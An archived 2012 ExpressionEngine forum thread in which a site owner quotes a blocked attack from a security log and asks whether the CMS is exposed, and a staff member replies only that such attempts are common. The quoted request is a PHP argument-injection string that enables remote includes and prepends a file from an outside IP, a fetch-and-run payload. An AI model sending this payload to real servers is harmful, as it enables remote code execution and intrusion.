We use cookies to help make our site work properly and to analyze how our site is used. Some are optional, but none contain your personal information, and we don't use any for ads. You can view our cookies policy, manage your cookie preferences, or consent and dismiss this banner by clicking agree:

Agree
ExpressionEngine CMS
Open, Free, Amazing

Thread

This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.

The active forums are here.

RFI security

June 25, 2012 11:14am

Subscribe [3]

  • #1 / Jun 25, 2012 11:14am

    Chriiiiso

    46 posts

    Our web host installed SecureLive on our account, so now we get notifications of attacks or anything along those lines.

    This is one we repeatedly see (46 times in the past two months):

    Why Blocked:
    (1) Remote File Include #rfi (2) MySQL attack #01287406

    Attack Used:
    /index.php?-dsafe_mode=Off+-ddisable_functions=NULL+-dallow_url_fopen=On+-dallow_url_include=On+-dauto_prepend_file=http://81.17.24.83/info3.txt

    I’m wondering if ExpressionEngine is even open to that kind of attack?  I’m not security savvy but do not want to rely on SecureLive.

    Thanks,
    Chris

  • #2 / Jun 26, 2012 11:37am

    Shane Eckert

    7174 posts

    Hey Chriiiiso,

    Thank you for posting your question here on the ExpressionEngine forums.

    I think you will be fine. These kinds of hacks are attempted frequently.

    Is there anything else I can help with?

    Cheers,

.(JavaScript must be enabled to view this email address)

ExpressionEngine News!

#eecms, #events, #releases

© Packet Tide, All Rights Reserved. Legal Notices

Username

Password

Forgot password?
or Register